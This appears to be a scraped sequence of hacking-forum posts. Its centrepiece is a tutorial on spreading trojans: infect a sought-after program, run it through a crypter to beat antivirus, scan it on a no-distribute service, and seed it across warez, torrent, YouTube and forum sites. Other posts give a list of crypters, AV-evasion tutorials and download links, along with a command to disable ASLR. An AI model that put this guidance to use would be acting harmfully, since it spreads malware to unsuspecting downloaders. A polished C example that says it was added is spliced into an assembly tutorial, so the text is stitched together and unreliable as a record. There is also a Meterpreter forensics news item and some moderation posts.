  11. Spreading By: Beaver What Is Spreading? Spreading Is The Way Your Program/Trojan/ETC Circulates Around The Internet. This Means That People At Some Point People Spread It For. This Is Your Goal, To Put Something Out There That Is Not Wide Spread And Is Hard To Find. It Is All About Finding That Niche (A Targeted Group Of People, Like Gamers) That Want Something, But Do Not Have It Yet. When This Is Done, People Will Download It And Put It On Their Site For Download or Put It On A Torrent. Getting Started 1. Finding The Right Program This Will Be The Hardest Part. Finding Out What Is Wanted At A Certain Point In Time Is Hard. Find Out What Niche You Want To Go After, For Example If You Are Going After Gamers, But Not Just Gamers, Let’s Say Gamers That Use Steam. You Have A Couple Of Options. One Is You Can Look Around The Net That Will Focus Directly On Steam Gamers (Screen Recorders, Voice Changers, etc.). Another Is You Can Make Your Own Program; This Will Insure That There Is Nothing Else Like It, But Make Sure That The Program Is Useful And It Works. After You Think You Have Found The Right Program, Upload It To Some Warez (Media Sharing) Sites, Like Warez-BB.org And Some Torrent (Peer-To-Peer Sharing) Sites, Like ThePirateBay.org To See How Many Downloads You Can Get In A Day. If The Number Is Below 25 Try Another Program. While 25 Is Decent Number For Beginners, It Is Just Not Enough To Make A Big Impact On The Net. Stay Away From Large Programs (Over 75 MB). 2. Infecting The Program This Will Either Require Money Or Programming Knowledge. If You Choose To Infect The Program That You Found You Make Sure What Ever You Are Infecting It From Is FUD (Fully Undetectable To Anti-Virus Software). To Achieve This You Will Need A Crypter (A Program That Changes The Programs Code To Make It Look It Different When Scanned By Anti – Virus Software). 
You Can Either Learn To Code One Of These, Which Is The Cheaper Way, But Is Time Consuming Or You Can Buy One From Many Of The Hacking Forums Out There, Like Ukn0wn.ws. They Can Cost Anywhere From $25 To $80. After You Infect The Program Run It Through The Crypter To Make It FUD. Where To Spread? This Is The Big Question. Knowing Where To Spread You Just Have To Go With Your Instinct, But Below You Will Find A List Of Sites And Site Types I Found Useful In My Spreading. • Warez Sites o Http://www.warez-bb.org o Http://www.Project-W.org o Bookmark Any Warez Sites You Come Across • Torrents o Http://www.ThePirateBay.org o Http://www.MiniNova.org o Http://www.Demonoid.com o Private Torrent Sites Are The Best, Because People Are Trustworthy On There • Forums (Based On Your Niche) o I Cannot Post Any Links, Because Depending On What Type Of Niche You Chose You Will Need To Find Those Types Of Forums. • Youtube o Make A Short Video, No More Than 30 Seconds That Has The Description (Read On That Below). Make Sure To Have Appropriate Music. After The Video Is Uploaded And Processed Submit The URL To Things Like StumbleUpon (Link Sharing) And Digg.com (Social News Site). What Do I Put? The Description Is Where It Makes Or Breaks Your Spreading. Make Sure You Always Use The Same Description. This Allows Easy Copy/Paste For The People That Will Post The Program Elsewhere. • Take At Least 1 Screen Shot Of The Program. Upload That To A Good Image Hosting Site, Like ww.TinyPic.com • Choose A Good File Host Where You Can Track The Number Of Downloads You Are Getting. If You Use Rapidshare.com Then Get A Legit Account. I Use Free Online Storage - File Qube, It Is Free And It Tracks Page Views and Downloads, And It Accepts A Lot Of File Types. • Write Out A Well Thought Out Description That Talks About How The Program Works, What The Features Are, ETC. 
• When Your Infected Is FUD, Upload It To NoVirusThanks - Free Online Virus & Malware Scan Service Making Sure To Check “Do Not Distribute The Sample”. This Site Scans Your File With All Of The Major Anti – Virus Software. That Check Box Makes Sure They Do Not Send Their Findings To The Anti- Virus Companies, This Means Your Program Will Stay FUD Longer. After It Is Done Grab The BB Code And HTML Code. • Keep Your Descriptions For Later Use. Keep The Description, One For Forums/Warez Sites That Has The NoVirusThanks BB Code, Download Link For Your Program, And The Links Or BB Code For Your Screen Shot(s) And One For Sites That Don’t Use BB Code, That Has The HTML Code From NoVirusThanks, Download Link For Your Program, And The Links Or BB Code For Your Screen Shot(s). Syndication Syndication Means That Others That Have Downloaded Your Program Are Posting It On Other Sites For You. This Means That Your Spreading Has Been A Major Success And You Should Be Happy. This Means You Do Not Have To Try As Hard To Get Download, Because Others Are Doing The Spreading For You. This Has Been A Beaver Tutorial. If You Want To Post This On Other Site Please Leave The Following. Written By Beaver For… http://www.Beaver.WS uNkn0wn.ws - Index page
  12. RAR 1 01 - DarkAvengard Crypter (Open source Code Crypter > p0ke >> Moded) 02 - h4ck-y0u.org crypter by DuSTY 03 - L0rD Crypter by haZl0oh 04 - AT4RE aSm Protecter 1.0 by Mouradpr 05 - AverCryptor 1.02 beta by os1r1s 06 - Cryptic 2.1 by Tughack 07 - Crew Crypter by North-Team 08 - Mortal Team Crypter 2.0 by Ras 09 - NOmeR1 by NOmeR1 and P.S. 10 - Poly! Crypt 2.8 by BUNG 11 - PowerCrypt 2.0 by N47RON 12 - Private Krypt 1.0 beta by t0pP8uZz 13 - PE Protector 0.9.2 CRYPToCRACK's by Lukas Fleischer 14 - Russian Cryptor 1.0 by master3 15 - SimbiOZ 2.1 by Extranger 16 - Snoop Crypt by snoop 17 - Zelda Crypt by snoop 18 - WinOfCrypt 1.0 by DarkPressure 19 - X-Crypter 1.2 Security-Bypass Version mod by Mareek 20 - X-Crypter 1.2 Private Version by x-zer0 RAR 2 01 - Break-Into-Pattern, a.k.a BIP, v.0.1 by Icingtaupe (ASM source) 02 - Crypter v.3.1 by SLESH 2007 (Delphi source) 03 - FFC v.1.6 Public by Juza 04 - File Crypter Pro by Aphex (Delphi source) 05 - GKrpto v.1.0 by User-99 06 - Open Source Code Crypter v.1.0 by p0ke (Delphi source) 07 - Open source file crypter (ass crypter) by assoftware (Delphi source) 08 - Pecrypt by archphase (Delphi source) 09 - Pscrambler v.1.2 by p0ke (Delphi source) 10 - Smokes Crypter v1.2 (Delphi source) 11 - Cigicigi File Crypter v1.0 by turkojan 12 - iPBProtect v0.1.5 beta [****] by Forgat 13 - MaskPE v.2.0 by yzkzero 14 - PEncrypt v.4.0 by JunkCode 15 - Perplex v.1.01dev by BliZZaRD 16 - SkD Undetectabler 2.0beta by skdrat 17 - ExeSax v.0.9.1 GUI 18 - VB-PE-Crypt 1.0 by Flo 19 - UnderGround Crypter v.1.0 by Booster2ooo 20 - Daemon Crypt v.2 Public by Evil_Inside RAR 3 01 - SCE v.0.5 (Silly Chr Encrypter) by sevenC 02 - SSE v.0.5 (Simple Streverse Encryption) by sevenC 03 - Vbsencrypter v.0.01 by K 04 - File Crypter by valdir_salguei ro (from brasil - source code included) 05 - RCryptor by Vaska - included versions 1.1+1.3+1.3b+1.4+1.5+1.6b+1.6d 06 - iNF[CRYPT] by LESHIY & [nht] 07 - CryptoFilez v.2.0 by Mr.Ded 08 - Morphnah Beta2 
by pyccxak.com Kas 09 - Pohernah v.1.0.2 by pyccxak.com Kas 10 - Pohernah v.1.0.3 by pyccxak.com Kas 11 - RPolyCrypt v.1.0b by Vasca 12 - StrAnGe CrYpTeR by TiPiaX (source code included) 13 - DalKrypt v1.0 by DalKiT (source code included) 14 - fEaRz Crypter v.1.0 beta1 by fEaRz 15 - Icrypt v.1.0 by BuGGz 16 - Minke v.1.0.1 by Codius 17 - Scramble Tool v0.2.3b By System33r (k0nsl) 18 - USC by p0ke - included versions 1.2D+2.1+2.1.1+Patch for 2.1.1 19 - NoodleCrypt 2 by NoodleSpa 20 - Werus Crypter v.1.0 Public version by pyccxak.com Kas All: Download: http://rs222.rapidshare.com/files/94316443/PackCrypters.rar
  13. I'll think about it some more. What if, instead of someone posting a program, they wrote: "If anyone wants it, add me at plm_hackeru" or something like that? Anyway, I'll decide that depending on the situation.
  14. Details? A Messenger spammer? One that sends lots of messages, or one where you log in and it sends mass messages, something like that? Or some kind of booter?
  15. Ok guys, I'm sure some people will agree with me here. These 3 tuts are by far the best I have ever seen on how to make whatever it is you're trying to make undetected by quite a few AVs. If you combine these techniques and learn how to do them correctly you could possibly make a program near FUD or FUD. Anyway, these 3 tuts helped me a lot and I thought I'd share them. They also explain to you what to do very clearly, have links to the tools you need and also have pictures showing you what to do. So it isn't just any nooby tuts, it's professional ones. The credits are at the beginning of the tuts when you open them. Please note that if anyone needs help with any of the tuts or doesn't understand some bits, please just post it up and I'll get back to you as soon as possible. Credits to Icarus. Download: http://www.2shared.com/file/7090483/b58610b6/Pack.html
  16. Assembly Language Basics Tutorial
-------------------------------------
By Aro

*Intro:
Hey, it's Aro and this is my first tutorial. This basic assembly tutorial shows the basic things you need to know. I had this idea that there are other people like me who are still learning and want someone to learn with, so I made this tutorial for people to learn along with me, so we can all spread information. If anyone who knows about assembly finds anything wrong in my tutorial, please correct me. I need feedback; it will let me know what I need to do to be better. Hope you like it. Aro.

This tutorial contains the following information:
*System Organization Basics
*CPU
*CPU Registers
*Stack

System Organization Basics:
--------------------------------------------------------------------------------------------------

CPU (aka Central Processing Unit):
------------------------------------------------------------------------------------------------------
*Control Unit: Retrieves/decodes instructions, retrieves/stores data in memory.
*Execution Unit: Actual execution of instructions.
*Register: Internal memory locations used as variables.
*Flags: Used to indicate various "events" while execution is happening.

CPU Registers:
-------------------------------------------------------------------------------------------------------------------------------------------------
Registers are internal memory locations used as variables. A register is 32 bits long, or 4 bytes. There are 8 registers: EAX, EBX, ECX, EDX, ESI, EDI, ESP, and EBP. The "E" at the beginning of all the registers indicates that it is a 32 bit register.

General Purpose Registers
--------------------------------------------------------------------------------------
*EAX (Accumulator Register): Generally used for storing operands and result data.
*EBX (Base Register): Used for storing pointers to data. Only register that can be used as an index.
*ECX (Counter Register): Used for loop operations.
*EDX (Data Register): Used as an input/output pointer.
*ESI, EDI (Pointer): Data Pointer Registers for memory operations, generally used for string operations.
*ESP (Pointer): Stack Pointer Register.
*EBP (Pointer): Stack Data Pointer Register.

32 bit registers can be split into 16 bit. In 16 bit programs only the lowest bits of the registers are used. They have the same names as the general registers but without the "E", example: AX, EX, CX, DX, SI, DI, SP, BP. The 16 bit register can be split into a high byte and a low byte. Example: EAX is 32 bit, AX is the lowest 16 bits of EAX, and then AX can be split into AH (high byte) and AL (low byte), which are one byte in size.

Segment Registers
--------------------------------------------------------------------------------------
*CS (Code segment) - 16 bit number that points to the active code segment
*DS (Data segment) - 16 bit number that points to the active data segment
*SS (Stack segment) - 16 bit number that points to the active stack segment
*ES (Extra segment) - 16 bit number that points to the active extra segment
*EIP (32 bit instruction pointer) points to the instruction being executed.
*A control register is a processor register which changes or controls the general behavior of a CPU or other digital device. Common tasks performed by control registers include interrupt control, switching the addressing mode, paging control, and coprocessor control. Check http://en.wikipedia.org/wiki/Control_register for more information.

Virtual Memory Model:
Every process is laid out in the same virtual memory space; it doesn't matter what the actual memory location is. Every process that runs in the system seems like it's running independently. There is a security feature in Linux 2.6 and higher called "randomize_va_space"; this feature protects against buffer overflows. randomize_va_space uses space randomization if enabled, set to 1 (true), which is the default; to disable it, change it to 0 (false). This will be helpful to practice buffer overflows. If you have Windows, don't do this though; I recommend you get Linux such as Ubuntu (even a live CD), it would help if you really want to get good at this. But if you want to get a disassembler, get NASM for Windows.

To disable the Linux patch (only do the stuff above if you want to or are going to practice doing buffer overflow attacks):
cat /proc/sys/kernel/randomize_va_space
echo 0 > /proc/sys/kernel/randomize_va_space
cat /proc/sys/kernel/randomize_va_space
Only do the stuff above if you want to or are going to practice doing buffer overflow attacks.^^^

Program Memory:
--------------------------------------------------------------------------------------------
*The first segment is the .text segment. This segment contains the actual program; the executable instructions are located here.
*The second segment is the .data. This is where any data that has been initialized with a value is held.
example:
.data
Int32: .int 2
*The third segment is the .bss. This is where unused data is held.
example:
.bss
.comm Buffer, 1024
*The third segment is the heap. The heap is where the virtual memory space is located.
*The fourth segment is just unused memory.
*The fifth segment is the Stack, which is generally used for storing function arguments and local variables. The stack is located in the highest memory location possible. It generally goes down the memory from highest to lowest memory. The stack is a last in, first out data structure, otherwise known as a LIFO (Last In First Out).

The Stack
-------------------------------------------------------------------------------------------------------------------------
As I said before, a stack is a temporary storage unit in computer memory where function arguments and local variables are stored. The LIFO principle is: the last value you put in is the first that comes out.
Just imagine you have a stack of papers. When I wanted my teacher to correct my test first, I would wait until everybody finished, so when I put my test on her desk I can sneak a peek at my score or how many red marks are on my test when she starts correcting it as we walk out of class. When you PUSH two values on the stack you will get the last one first because of that method.

PUSH - pushes value on stack
POP - removes from stack
ESP - Points to stack

Example of LIFO Principle REMEMBER MUST KNOW LIFO:
Right here is an example of a stack. The ESP register holds 0x000008 which is the top of the stack.
example:
ESP 0x0000008
The stack adds a new value (0x0000007) and (0x0000006) using the PUSH operation.
example:
PUSH 0x0000007
PUSH 0x0000006
Now we update the ESP pointer to the top of the stack to the address 0x00000006.
example:
ESP 0x0000006
Now we use the POP operation to take that value off the stack, which removes the last operation put into the stack (LIFO REMEMBER).
example:
POP 0x00000006
Next we have to update the ESP pointer to value 0x0000007.
example:
ESP 0x00000007
Next we have to POP the first value we put in off the stack. (LIFO)
example:
POP 0x00000007
Finally we update the ESP pointer register to the top of the stack.
example:
ESP 0x0000008
Now I hope you understand the LIFO Principle; if you don't, leave a question. Or Google.com, it's the best hacking site. If you don't understand or I explained something wrong, leave a message. Someone who knows Assembly or I will hopefully answer. I'll write part two later. Please leave feedback, good or bad. I don't care. I need to get better.

Assembly Language Basics Tutorial
Aro Out
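A small C model of two things the tutorial above describes: how the 8-bit and 16-bit names (AL, AH, AX) are views into the same 32-bit register (EAX), and how PUSH and POP move ESP on a stack that grows toward lower addresses. This is an added example, not code from the original post or from Aro; the memory region, the `Machine` type and the function names are constructed for the illustration, and the x86 semantics modelled are only the ones the tutorial states.

```c
/* Model of 32-bit x86 sub-register views and a downward-growing stack.
   Added example; the Machine type and function names are constructed here. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* AX is the low 16 bits of EAX; AH and AL are the high and low byte of AX. */
uint16_t low16(uint32_t r) { return (uint16_t)(r & 0xFFFFu); }
uint8_t  high8(uint32_t r) { return (uint8_t)((r >> 8) & 0xFFu); }
uint8_t  low8(uint32_t r)  { return (uint8_t)(r & 0xFFu); }

/* Writing AL or AH changes EAX in place: the byte names are views, not copies. */
uint32_t set_low8(uint32_t r, uint8_t v)  { return (r & 0xFFFFFF00u) | v; }
uint32_t set_high8(uint32_t r, uint8_t v) { return (r & 0xFFFF00FFu) | ((uint32_t)v << 8); }

/* A constructed 64-byte memory region. The stack sits at its top and
   grows toward lower addresses; ESP is a byte offset into `mem`. */
#define STACK_BYTES 64

typedef struct {
    uint8_t  mem[STACK_BYTES];
    uint32_t esp;   /* address of the current top-of-stack slot */
} Machine;

void machine_init(Machine *m) {
    memset(m->mem, 0, sizeof m->mem);
    m->esp = STACK_BYTES;   /* empty stack: ESP points just past the region */
}

/* PUSH: decrement ESP by 4, then store the dword at the new ESP.
   Returns 0 instead of writing below the region. */
int push(Machine *m, uint32_t value) {
    if (m->esp < 4) return 0;
    m->esp -= 4;
    memcpy(&m->mem[m->esp], &value, 4);
    return 1;
}

/* POP: load the dword at ESP, then increment ESP by 4.
   Returns 0 on an empty stack instead of reading past the region. */
int pop(Machine *m, uint32_t *out) {
    if (m->esp + 4 > STACK_BYTES) return 0;
    memcpy(out, &m->mem[m->esp], 4);
    m->esp += 4;
    return 1;
}

/* Replays the post's sequence (PUSH 7, PUSH 6, POP, POP) and returns 1 if
   the values came back in LIFO order and ESP ended where it started. */
int lifo_demo(void) {
    Machine m;
    uint32_t a = 0, b = 0, c = 0;
    machine_init(&m);
    uint32_t start = m.esp;
    push(&m, 7);
    push(&m, 6);
    int ok = (m.esp == start - 8);        /* two dwords below the start */
    ok &= pop(&m, &a) && a == 6;          /* last in comes out first */
    ok &= pop(&m, &b) && b == 7;
    ok &= (m.esp == start);               /* ESP back at the top */
    ok &= !pop(&m, &c);                   /* popping an empty stack is refused */
    return ok;
}

int main(void) {
    uint32_t eax = 0x12345678u;
    printf("EAX=%08x AX=%04x AH=%02x AL=%02x\n",
           eax, low16(eax), high8(eax), low8(eax));
    eax = set_low8(eax, 0xAA);
    printf("after mov al, 0xAA: EAX=%08x\n", eax);
    printf("LIFO demo %s\n", lifo_demo() ? "ok" : "FAILED");
    return 0;
}
```

The bounds checks in `push` and `pop` are the part a real CPU does not do for you: hardware moves ESP and reads or writes memory regardless, which is why the tutorial's note about function arguments and local variables living on the stack matters for buffer overflows.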
  17. E-Book Table of Contents
[Abstract] (p. 3)
[Introduction] (p. 3)
[Obtaining Information Using Error Messages] (p. 7)
[Leveraging Further Access] (p. 12)
  [xp_cmdshell] (p. 12)
  [xp_regread] (p. 13)
  [Other Extended Stored Procedures] (p. 13)
  [Linked Servers] (p. 14)
  [Custom extended stored procedures] (p. 14)
  [Importing text files into tables] (p. 15)
  [Creating Text Files using BCP] (p. 15)
  [ActiveX automation scripts in SQL Server] (p. 15)
[Stored Procedures] (p. 17)
[Advanced SQL Injection] (p. 18)
  [Strings without quotes] (p. 18)
  [Second-Order SQL Injection] (p. 18)
  [Length Limits] (p. 20)
  [Audit Evasion] (p. 21)
[Defences] (p. 21)
  [Input Validation] (p. 21)
  [SQL Server Lockdown] (p. 23)
[References] (p. 24)
Appendix A - 'SQLCrack' (p. 25)
  (sqlcrack.sql) (p. 25)
Download: http://www.ngssoftware.com/papers/advanced_sql_injection.pdf
  18. Researchers will release an open source tool at Black Hat USA that helps forensics investigators reconstruct attacks that use a popular Metasploit payload to cover its tracks. Mandiant's Steve Davis and Peter Silberman have developed an "anti-" anti-forensics tool, of sorts, tentatively called the Metasploit Forensics Framework, which they'll demonstrate at the security conference later this month. The tool is aimed at unmasking what Metasploit's stealthy Meterpreter (PDF) did on a machine. Meterpreter lets developers write code in DLL files and execute everything in memory -- without writing anything to the victim machine's disk, where it could be detected and, in turn, complicate incident response. Meterpreter can be used to download and upload files, execute code, and open its own command shell, the researchers say. Their new tool can tell if a Meterpreter packet is still in memory, and, if so, which files Meterpreter has accessed, and whether it has modified a registry key. Some traditional antivirus tools can't detect Meterpreter-borne attacks because they never hit the disk, the researchers say. "You wouldn't see the attacks happen if they didn't write anything to disk," says Steve Davis, one of the researchers and a consultant with Mandiant. "We are going to show how we can reconstruct a crime scene in memory." The Metasploit Forensics Framework is a proof-of-concept tool that scans the processes in memory. "Meterpreter has unique packets...and we can identify those and reconstruct its processes," says Peter Silberman, an engineer on the product team at Mandiant. "We're going to discuss how Meterpreter looks in memory, and how it's able to circumvent traditional tools [for forensics]. We'll demonstrate how with some advanced knowledge, you can reconstruct what commands were sent to Meterpreter and perform an autopsy on an attack." Memory analysis in forensics has only begun to catch on tool-wise in the past year or so, the researchers say.
Their tool helps investigators pull useful information from memory to help in their forensics work, they say. "This is just a small research project in how freed memory can still pull out a lot of useful information on the commands [an attacker] used," for example, Silberman says. The researchers say they fully expect the Metasploit developers to come up with a workaround for their tool in short order once it's released. They plan to make the tool available on Mandiant's Website the day of their Black Hat presentation so attendees can experiment with it during their talk, they say.
  19. You're going to end up a criminal... Ban!
  20. I can make a tool or something, just give me ideas. Oh, and it shouldn't be much work, I get bored quickly.
  21. I searched for a working one for so long... I think this one works well. Download: http://www.freeproxy.ru/download/P_Checker.exe
  22. If it's the one I know, I don't like it. I mean, the macro trick is old. And in 95% of cases it won't work. A lot could be done if it worked...
  23. I'm restarting the warnings campaign. You will get a warning if you:
- revive an old topic for no reason - Look at the date of the last post yourselves
- post your ID - Discussions take place on the forum
- post in the wrong categories - Think a little before opening a topic and pick the right category. All requests go in CERERI, not in Programe Hack or anywhere else.
The old reasons for warnings still apply as well, especially off-topic. At 3 warnings, a one-week ban, depending on the mood I'm in. If something doesn't suit you, go throw a fit.
  24. Ban. Look at the dates of the last posts.
  25. Download: http://www.2shared.com/file/7084370/1c5af5a1/BOF.html